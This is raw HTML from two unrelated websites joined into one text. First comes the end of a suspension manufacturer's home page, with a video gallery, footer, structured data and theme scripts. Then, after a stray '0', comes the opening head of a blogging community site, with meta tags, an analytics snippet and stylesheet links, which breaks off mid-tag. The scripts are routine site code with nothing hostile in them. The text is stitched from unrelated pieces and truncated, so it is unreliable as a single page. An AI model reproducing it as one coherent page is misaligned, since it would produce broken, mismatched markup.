id="image-2256-5-2-2" class="module module-image image-2256-5-2-2 image-top auto_fullwidth" data-id="5ebf1f0"> <div class="image-wrap"> <a href="https://www.youtube.com/watch?v=hSL8cCy0jvE" rel="noopener" target="_blank"> <img src="https://fortune-auto.com/wp-content/uploads/2014/03/BTS-600x600.jpg" width="600" height="600" class=" wp-post-image wp-image-4093" alt="bts" srcset="https://fortune-auto.com/wp-content/uploads/2014/03/BTS.jpg 600w, https://fortune-auto.com/wp-content/uploads/2014/03/BTS-150x150.jpg 150w, https://fortune-auto.com/wp-content/uploads/2014/03/BTS-300x300.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /> </a> </div> </div> </div> </div> <div class="module_column tb-column col4-1 last tb_2256_column module_column_3 module_column_2256-5-3" data-id="9e03258"> <div class="tb-column-inner"> <div id="divider-2256-5-3-0" class="module module-divider divider-2256-5-3-0 solid " data-id="ba83e17" style="border-width: 40px;border-color: rgba(0,0,0, 0);"> </div> <div id="image-2256-5-3-1" class="module module-image image-2256-5-3-1 image-top auto_fullwidth" data-id="dfa9a5d"> <div class="image-wrap"> <a href="/concave-flow-digressive-piston"> <img src="https://fortune-auto.com/wp-content/uploads/2014/03/CFD-600x600.jpg" width="600" height="600" class=" wp-post-image wp-image-4094" alt="cfd" srcset="https://fortune-auto.com/wp-content/uploads/2014/03/CFD.jpg 600w, https://fortune-auto.com/wp-content/uploads/2014/03/CFD-150x150.jpg 150w, https://fortune-auto.com/wp-content/uploads/2014/03/CFD-300x300.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /> </a> </div> </div> <div id="image-2256-5-3-2" class="module module-image image-2256-5-3-2 image-top auto_fullwidth" data-id="e55c94c"> <div class="image-wrap"> <a href="/william-au-yeung/"> <img src="https://fortune-auto.com/wp-content/uploads/2018/01/WilliamAuYeung-600x600.jpg" width="600" height="600" class=" wp-post-image wp-image-9878" alt="WilliamAuYeung" srcset="https://fortune-auto.com/wp-content/uploads/2018/01/WilliamAuYeung.jpg 600w, https://fortune-auto.com/wp-content/uploads/2018/01/WilliamAuYeung-150x150.jpg 150w, https://fortune-auto.com/wp-content/uploads/2018/01/WilliamAuYeung-300x300.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /> </a> </div> </div> </div> </div> </div> </div> <div class="themify_builder_row module_row clearfix builder-parallax-scrolling module_row_6 themify_builder_2256_row module_row_2256-6 hide-tablet hide-mobile" data-id="885908d"> <div class="builder_row_cover tb-row-cover-hover"></div> <div class="row_inner col_align_top"> <div class="module_column tb-column col-full first tb_2256_column module_column_0 module_column_2256-6-0" data-id="10a629d"> <div class="tb-column-inner"> <div id="text-2256-6-0-0" class="module module-text text-2256-6-0-0 " data-id="c373534"> <h1 style="text-align: center;">VIDEOS</h1><div id='video-loop-1' class='loops-wrapper shortcode video grid3 video-multiple clearfix type-multiple'> <article id="post-9873" class="post clearfix video-post post-9873 type-video status-publish hentry video-category-uncategorized has-post-title has-post-date has-post-category has-post-tag has-post-comment no-post-author "> <figure class="post-image thumb-src " data-thumb="https://img.youtube.com/vi/Dejtr8QlO30/hqdefault.jpg"> <a href="https://www.youtube.com/watch?v=Dejtr8QlO30?iframe=true&#038;width=100%25&#038;height=100%25" class="themify_lightbox"><img alt="" title="" src="https://img.youtube.com/vi/Dejtr8QlO30/hqdefault.jpg" width="360" /></a> </figure> <div class="post-content"> </div> </article> <article id="post-5374" class="post clearfix video-post post-5374 type-video status-publish hentry video-category-uncategorized has-post-title has-post-date has-post-category has-post-tag has-post-comment no-post-author "> <figure class="post-image thumb-src " data-thumb="https://img.youtube.com/vi/1Ne9L6zFqio/hqdefault.jpg"> <a href="https://www.youtube.com/watch?v=1Ne9L6zFqio?iframe=true&#038;width=100%25&#038;height=100%25" class="themify_lightbox"><img alt="" title="" src="https://img.youtube.com/vi/1Ne9L6zFqio/hqdefault.jpg" width="360" /></a> </figure> <div class="post-content"> </div> </article> <article id="post-5373" class="post clearfix video-post post-5373 type-video status-publish hentry video-category-uncategorized has-post-title has-post-date has-post-category has-post-tag has-post-comment no-post-author "> <figure class="post-image thumb-src " data-thumb="https://img.youtube.com/vi/tqHg_Gf7JSo/hqdefault.jpg"> <a href="https://www.youtube.com/watch?v=tqHg_Gf7JSo?iframe=true&#038;width=100%25&#038;height=100%25" class="themify_lightbox"><img alt="" title="" src="https://img.youtube.com/vi/tqHg_Gf7JSo/hqdefault.jpg" width="360" /></a> </figure> <div class="post-content"> </div> </article> <article id="post-5371" class="post clearfix video-post post-5371 type-video status-publish hentry video-category-uncategorized has-post-title has-post-date has-post-category has-post-tag has-post-comment no-post-author "> <figure class="post-image thumb-src " data-thumb="https://i.vimeocdn.com/video/512749033_295x166.jpg"> <a href="https://vimeo.com/123419453?iframe=true&#038;width=100%25&#038;height=100%25" class="themify_lightbox"><img alt="Fortune Auto - Concave Flow Digressive Piston - 510 &amp; Dreadnought PRO Series" title="Fortune Auto - Concave Flow Digressive Piston - 510 &amp; Dreadnought PRO Series" src="https://i.vimeocdn.com/video/512749033_295x166.jpg" width="360" /></a> </figure> <div class="post-content"> </div> </article> <article id="post-5370" class="post clearfix video-post post-5370 type-video status-publish hentry video-category-uncategorized has-post-title has-post-date has-post-category has-post-tag has-post-comment no-post-author "> <figure class="post-image thumb-src " data-thumb="https://img.youtube.com/vi/9OA3xCD5dMk/hqdefault.jpg"> <a href="https://www.youtube.com/watch?v=9OA3xCD5dMk?iframe=true&#038;width=100%25&#038;height=100%25" class="themify_lightbox"><img alt="" title="" src="https://img.youtube.com/vi/9OA3xCD5dMk/hqdefault.jpg" width="360" /></a> </figure> <div class="post-content"> </div> </article> <article id="post-5369" class="post clearfix video-post post-5369 type-video status-publish hentry video-category-uncategorized has-post-title has-post-date has-post-category has-post-tag has-post-comment no-post-author "> <figure class="post-image thumb-src " data-thumb="https://i.vimeocdn.com/video/619968621_640.jpg"> <a href="https://vimeo.com/205251026?iframe=true&#038;width=100%25&#038;height=100%25" class="themify_lightbox"><img alt="Fortune Auto Suspension - Generation 6 Improvements and Upgrades" title="Fortune Auto Suspension - Generation 6 Improvements and Upgrades" src="https://i.vimeocdn.com/video/619968621_640.jpg" width="360" /></a> </figure> <div class="post-content"> </div> </article> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div id="footerwrap"> <footer id="footer" class="pagewidth clearfix" itemscope="itemscope" itemtype="https://schema.org/WPFooter"> <div class="footer-widgets clearfix"> <div class="col3-1 first"> <div id="widget_sp_image-5" class="widget widget_sp_image"><img width="300" height="195" class="attachment-medium" style="max-width: 100%;" srcset="https://fortune-auto.com/wp-content/uploads/2017/01/757px-SEMA-logo.svg-300x195.png 300w, https://fortune-auto.com/wp-content/uploads/2017/01/757px-SEMA-logo.svg-768x500.png 768w, https://fortune-auto.com/wp-content/uploads/2017/01/757px-SEMA-logo.svg-1024x667.png 1024w, https://fortune-auto.com/wp-content/uploads/2017/01/757px-SEMA-logo.svg.png 1573w" sizes="(max-width: 300px) 100vw, 300px" src="https://fortune-auto.com/wp-content/uploads/2017/01/757px-SEMA-logo.svg-300x195.png" /></div> </div> <div class="col3-1 "> <div id="text-10" class="widget widget_text"> <div class="textwidget"><p>1495 Oakbridge Terrace<br /> Powhatan, VA 23139</p> <p>Email: <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="c390a2afa6b083a5acb1b7b6ada6eea2b6b7acedada6b7">[email&#160;protected]</a><br /> Phone: 877-227-0260</p> </div> </div> </div> <div class="col3-1 "> <div id="themify-social-links-1009" class="widget themify-social-links"><ul class="social-links vertical"> <li class="social-link-item facebook font-icon icon-large"> <a href="https://www.facebook.com/FortuneAuto" target="_blank"><i class="fa fa-facebook" style="color: #ffffff;"></i> Facebook</a> </li> <li class="social-link-item instagram font-icon icon-large"> <a href="https://www.instagram.com/fortuneautousa/" target="_blank"><i class="fa fa-instagram" style="color: #ffffff;"></i> Instagram</a> </li> <li class="social-link-item youtube font-icon icon-large"> <a href="https://www.youtube.com/channel/UCu_6CszSIMyssYoyT-dUn9g" target="_blank"><i class="fa fa-youtube" style="color: #ffffff;"></i> YouTube</a> </li> </ul></div> </div> </div> <div class="footer-text clearfix"> <div class="one">© 2018 Fortune Auto North America</div> <div class="two">#handbuilt4me</div> </div> </footer> </div> </div> <div class="body-overlay"></div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="application/ld+json">[{"@context":"https:\/\/schema.org","@type":"WebPage","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/fortune-auto.com\/"},"headline":"Home","datePublished":"2014-03-17T22:43:33-05:00","dateModified":"2014-03-17T22:43:33-05:00","description":"","commentCount":"0"},{"@context":"https:\/\/schema.org","@type":"CreativeWork","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/fortune-auto.com\/video\/whats-it-like-to-build-track-coilovers\/"},"headline":"Gears &#038; Gasoline &#8211; What&#8217;s it Like to Build Track Coilovers?","datePublished":"2018-01-04T14:21:13-05:00","dateModified":"2018-01-04T14:21:13-05:00","description":"","commentCount":"0","video":{"@type":"VideoObject","url":"https:\/\/www.youtube.com\/watch?v=Dejtr8QlO30","thumbnailUrl":"https:\/\/i.ytimg.com\/vi\/Dejtr8QlO30\/hqdefault.jpg","uploadDate":"2018-01-04T14:21:13-05:00","description":"","name":"What's it Like to Build Track Coilovers?"}},{"@context":"https:\/\/schema.org","@type":"CreativeWork","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/fortune-auto.com\/video\/street-friendly-coilovers\/"},"headline":"Speed Academy &#8211; Street Friendly Coilovers","datePublished":"2017-01-10T12:03:46-05:00","dateModified":"2017-01-10T12:03:46-05:00","description":"","commentCount":"0","video":{"@type":"VideoObject","url":"https:\/\/www.youtube.com\/watch?v=1Ne9L6zFqio","thumbnailUrl":"https:\/\/i.ytimg.com\/vi\/1Ne9L6zFqio\/hqdefault.jpg","uploadDate":"2017-01-10T12:03:46-05:00","description":"","name":"New Street Friendly Coilovers For The Evo - Project Super 8"}},{"@context":"https:\/\/schema.org","@type":"CreativeWork","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/fortune-auto.com\/video\/how-suspension-is-made\/"},"headline":"Speed Academy &#8211; How Suspension Is Made","datePublished":"2017-01-10T12:02:28-05:00","dateModified":"2017-01-10T12:02:28-05:00","description":"","commentCount":"0","video":{"@type":"VideoObject","url":"https:\/\/www.youtube.com\/watch?v=tqHg_Gf7JSo","thumbnailUrl":"https:\/\/i.ytimg.com\/vi\/tqHg_Gf7JSo\/hqdefault.jpg","uploadDate":"2017-01-10T12:02:28-05:00","description":"","name":"How Coilover Suspension Is Made - Fortune Auto Factory Tour"}},{"@context":"https:\/\/schema.org","@type":"CreativeWork","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/fortune-auto.com\/video\/concave-flow-digressive-piston\/"},"headline":"Concave Flow Digressive Piston","datePublished":"2017-01-10T12:00:29-05:00","dateModified":"2017-01-10T12:00:29-05:00","description":"","commentCount":"0","video":{"@type":"VideoObject","url":"https:\/\/vimeo.com\/123419453","thumbnailUrl":"http:\/\/i.vimeocdn.com\/video\/512749033_295x166.jpg","uploadDate":"2015-03-27 11:23:18","description":"Fortune Auto's revolutionary Concave Flow Digressive piston technology \nallows for a zero compromise track oriented damper that can be driven on the road.\n\nFortune Auto has developed a damper with an unprecedented adjustment range and ultra responsive digressive valving. Concave Flow Digressive piston shares the same technology in its 510 and Dreadnought Series Single, Double and Triple adjustable shock absorbers. Available in many applications and developed for the Road and Track.","name":"Fortune Auto - Concave Flow Digressive Piston - 510 & Dreadnought PRO Series"}},{"@context":"https:\/\/schema.org","@type":"CreativeWork","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/fortune-auto.com\/video\/510-series-on-an-evo\/"},"headline":"Gears &#038; Gasoline &#8211; 510 Series on an EVO","datePublished":"2017-01-10T11:59:49-05:00","dateModified":"2017-01-10T11:59:49-05:00","description":"","commentCount":"0","video":{"@type":"VideoObject","url":"https:\/\/www.youtube.com\/watch?v=9OA3xCD5dMk","thumbnailUrl":"https:\/\/i.ytimg.com\/vi\/9OA3xCD5dMk\/hqdefault.jpg","uploadDate":"2017-01-10T11:59:49-05:00","description":"","name":"Installing Fortune Auto 510s on the Evo"}},{"@context":"https:\/\/schema.org","@type":"CreativeWork","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/fortune-auto.com\/video\/generation-6-improvements\/"},"headline":"Generation 6 Improvements","datePublished":"2017-01-10T11:51:35-05:00","dateModified":"2017-01-10T11:51:35-05:00","description":"","commentCount":"0","video":{"@type":"VideoObject","url":"https:\/\/vimeo.com\/205251026","thumbnailUrl":"http:\/\/i.vimeocdn.com\/video\/619968621_640.jpg","uploadDate":"2017-02-22 12:36:12","description":"Here at Fortune Auto, we believe it's all about progression. Because all of our Coilovers are custom and hand-built to order, we knew exactly where improvements could be made and this resulted in our Gen 6 lineup! To learn more about our latest generation of Bespoke Suspension, click over to www.fortune-auto.com\n#fortuneauto #handbuilt4me","name":"Fortune Auto Suspension - Generation 6 Improvements and Upgrades"}}]</script> <script type='text/javascript'> /* <![CDATA[ */ var themify_vars = {"version":"4.2.4","url":"https:\/\/fortune-auto.com\/wp-content\/themes\/themify-music\/themify","map_key":"AIzaSyDukwIM68759FJ6k3cjQbIjO4K2QAEOj2w","includesURL":"https:\/\/fortune-auto.com\/wp-includes\/","isCached":"on","minify":{"css":{"themify-icons":1,"themify.framework":1,"lightbox":1,"themify-builder-style":1},"js":{"backstretch.themify-version":1,"bigvideo":1,"themify.dropdown":1,"themify.builder.script":1,"themify.scroll-highlight":1,"themify-youtube-bg":1,"themify.parallaxit":1,"themify.ticks":1}}}; var tbLocalScript = {"isAnimationActive":"1","isParallaxActive":"1","isParallaxScrollActive":"1","isStickyScrollActive":"1","animationInviewSelectors":[".module.wow",".module_row.wow",".builder-posts-wrap > .post.wow"],"backgroundSlider":{"autoplay":5000},"animationOffset":"100","videoPoster":"https:\/\/fortune-auto.com\/wp-content\/themes\/themify-music\/themify\/themify-builder\/img\/blank.png","backgroundVideoLoop":"yes","builder_url":"https:\/\/fortune-auto.com\/wp-content\/themes\/themify-music\/themify\/themify-builder","framework_url":"https:\/\/fortune-auto.com\/wp-content\/themes\/themify-music\/themify","version":"4.2.4","fullwidth_support":"1","fullwidth_container":"body","loadScrollHighlight":"1","addons":[],"breakpoints":{"tablet_landscape":[769,"1024"],"tablet":[681,"768"],"mobile":"480"},"ticks":{"tick":30,"ajaxurl":"https:\/\/fortune-auto.com\/wp-admin\/admin-ajax.php","postID":2256}}; var themifyScript = {"lightbox":{"lightboxSelector":".themify_lightbox","lightboxOn":true,"lightboxContentImages":true,"lightboxContentImagesSelector":".post-content a[href$=jpg],.page-content a[href$=jpg],.post-content a[href$=gif],.page-content a[href$=gif],.post-content a[href$=png],.page-content a[href$=png],.post-content a[href$=JPG],.page-content a[href$=JPG],.post-content a[href$=GIF],.page-content a[href$=GIF],.post-content a[href$=PNG],.page-content a[href$=PNG],.post-content a[href$=jpeg],.page-content a[href$=jpeg],.post-content a[href$=JPEG],.page-content a[href$=JPEG]","theme":"pp_default","social_tools":false,"allow_resize":true,"show_title":false,"overlay_gallery":false,"screenWidthNoLightbox":600,"deeplinking":false,"contentImagesAreas":".post, .type-page, .type-highlight, .type-slider, .gallery-wrapper, .type-gallery","gallerySelector":".gallery-icon > a","lightboxGalleryOn":true},"lightboxContext":"body"}; var tbScrollHighlight = {"fixedHeaderSelector":"#headerwrap.fixed-header","speed":"900","navigation":"#main-nav, .module-menu .ui.nav","scrollOffset":"0"}; /* ]]> */ </script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/themify/js/main.min.js?ver=4.2.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/spinner.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/effect-shake.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4'></script> <script type='text/javascript'> jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Close","currentText":"Today","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Previous","dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"dateFormat":"MM d, yy","firstDay":1,"isRTL":false});}); </script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/themify/js/backstretch.themify-version.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.1.1'></script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/js/jquery.masonry.min.js?ver=1.9.4'></script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/themify/js/themify.sidemenu.min.js?ver=1.9.4'></script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/js/jquery.iframe-auto-height.min.js?ver=5.1.1'></script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/js/themibox.min.js?ver=1.9.4'></script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/js/jquery.dominant-color.min.js?ver=1.9.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var themifyScript = {"themeURI":"https:\/\/fortune-auto.com\/wp-content\/themes\/themify-music","lightbox":{"lightboxSelector":".themify_lightbox","lightboxOn":true,"lightboxContentImages":true,"lightboxContentImagesSelector":".post-content a[href$=jpg],.page-content a[href$=jpg],.post-content a[href$=gif],.page-content a[href$=gif],.post-content a[href$=png],.page-content a[href$=png],.post-content a[href$=JPG],.page-content a[href$=JPG],.post-content a[href$=GIF],.page-content a[href$=GIF],.post-content a[href$=PNG],.page-content a[href$=PNG],.post-content a[href$=jpeg],.page-content a[href$=jpeg],.post-content a[href$=JPEG],.page-content a[href$=JPEG]","theme":"pp_default","social_tools":false,"allow_resize":true,"show_title":false,"overlay_gallery":false,"screenWidthNoLightbox":600,"deeplinking":false,"contentImagesAreas":".post, .type-page, .type-highlight, .type-slider, .gallery-wrapper, .type-gallery","gallerySelector":".gallery-icon > a","lightboxGalleryOn":true},"lightboxContext":"#pagewrap","fixedHeader":"fixed-header","ajax_nonce":"fe55357720","ajax_url":"https:\/\/fortune-auto.com\/wp-admin\/admin-ajax.php","is_ajax":"","smallScreen":"760","resizeRefresh":"250","videoRatio":"1.777777777777778","parallaxHeader":"1","themibox":{"close":"<i class=\"close-lightbox ti-close\"><\/i>"},"autoplay":"","albumLightbox":"true","fixedHeaderHeightCons":"74","back_top":"<a class=\"floating-back-top floating-back-top-hide\" href=\"#header\"><span>Back to top<\/span><\/a>"}; /* ]]> */ </script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/js/themify.script.min.js?ver=1.9.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var themifyVars = {"play":"yes","autoplay":"5","speed":"500","wrap":"yes","backgroundMode":"cover","backgroundPosition":"center-center"}; /* ]]> */ </script> <script type='text/javascript' defer="defer" src='https://fortune-auto.com/wp-content/themes/themify-music/js/themify.header-slider.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/comment-reply.min.js?ver=5.1.1'></script> <script type='text/javascript' src='https://fortune-auto.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script type="text/javascript"> jQuery(document).ready(function($){ setTimeout(function(){ if (window.matchMedia("(max-width: 768px)").matches) { $(document).find('video').trigger('pause'); $(document).find('.big-video-wrap video').remove(); } else{ //$(document).find('video').trigger('play'); } }, 1000); }); </script> <div id="wpfooter"></div> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head > <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Famous Bloggers - Build Authority Through Blogging</title> <!-- Open Graph Meta Tags generated by MashShare 3.6.1 - https://mashshare.net --> <meta property="og:type" content="article" /> <meta property="og:title" content="Famous Bloggers - Build Authority Through Blogging" /> <meta property="og:url" content="http://famousbloggers.net/" /> <meta property="og:site_name" content="Famous Bloggers" /> <meta property="article:author" content="http://www.facebook.com/hishaman" /> <meta property="article:publisher" content="http://www.facebook.com/famousbloggers" /> <meta property="article:published_time" content="2012-04-02T10:13:12+00:00" /> <meta property="article:modified_time" content="2016-06-18T16:01:15+00:00" /> <meta property="og:updated_time" content="2016-06-18T16:01:15+00:00" /> <!-- Open Graph Meta Tags generated by MashShare 3.6.1 - https://www.mashshare.net --> <!-- Twitter Card generated by MashShare 3.6.1 - https://www.mashshare.net --> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Famous Bloggers - Build Authority Through Blogging"> <meta name="twitter:description" content=""> <meta name="twitter:site" content="@FamousBloggers"> <meta name="twitter:creator" content="@hishaman"> <!-- Twitter Card generated by MashShare 3.6.1 - https://www.mashshare.net --> <!-- This site is optimized with the Yoast SEO plugin v10.0 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Build authority in your industry through blogging, join a large community of bloggers and learn how to blog and start a business blog online."/> <link rel="canonical" href="http://famousbloggers.net/" /> <link rel="publisher" href="https://plus.google.com/108327128521477426040/about"/> <meta name="google-site-verification" content="Cjf-gVdenemzQ0fXSAmKrpVRkZ69IkkKIplWRE_mWy0" /> <meta name="p:domain_verify" content="3e7b637d25824c8b1cde2c263942f415" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Famous Bloggers &raquo; Feed" href="http://famousbloggers.net/feed" /> <link rel="alternate" type="application/rss+xml" title="Famous Bloggers &raquo; Comments Feed" href="http://famousbloggers.net/comments/feed" /> <link rel="alternate" type="application/rss+xml" title="Famous Bloggers &raquo; Famous Bloggers Comments Feed" href="http://famousbloggers.net/famous-bloggers-2/feed" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.4.2 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.4.2'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-11221822-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-11221822-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'linkid', 'linkid.js'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/famousbloggers.net\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='genesis-fb-css' href='http://famousbloggers.net/wp-content/themes/genesis-fb/style.css' type='text/css' media='all' /> <style id='genesis-fb-inline-css' type='text/css'> a, .entry-title a:focus, .entry-title a:hover, .genesis-nav-menu a:focus, .genesis-nav-menu a:hover, .genesis-nav-menu .current-menu-item > a, .genesis-nav-menu .sub-menu .current-menu-item > a:focus, .genesis-nav-menu .sub-menu .current-menu-item > a:hover, .js nav button:focus, .js .menu-toggle:focus { color: #0073aa; } button:focus, button:hover, input:focus[type="button"], input:focus[type="reset"], input:focus[type="submit"], input:hover[type="button"], input:hover[type="reset"], input:hover[type="submit"], .archive-pagination li a:focus, .archive-pagination li a:hover, .archive-pagination .active a, .button:focus, .button:hover, .sidebar .enews-widget input[type="submit"] { background-color: #0073aa; color: #ffffff; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://famousbloggers.net/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_stylesheet-css' href='http://famousbloggers.net/wp-content/plugins/captcha/css/front_end_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='http://famousbloggers.net/wp-includes/css/dashicons.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_desktop_style-css' href='http://famousbloggers.net/wp-content/plugins/captcha/css/desktop_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='mashsb-styles-css' href='http://famousbloggers.net/wp-content/plugins/mashsharer/assets/css/mashsb.min.css' type='text/css' media='all' /> <style id='mashsb-styles-inline-css' type='text/css'> .mashsb-count {color:#cccccc;}@media only screen and (min-width:568px){.mashsb-buttons a {min-width: 177px;}} </style> <link rel='stylesheet' id='wprs-css' href='http://famousbloggers.net/wp-content/plugins/wp-rich-snippets/assets/css/style_front.css' type='text/css' media='all' /> <link rel='stylesheet' id='wprs-bootstrap-css' href='http://famousbloggers.net/wp-content/plugins/wp-rich-snippets/assets/css/bootstrap.min.css' type='text/css' media='all' /> <link crossorigin="anonymous" rel='stylesheet' 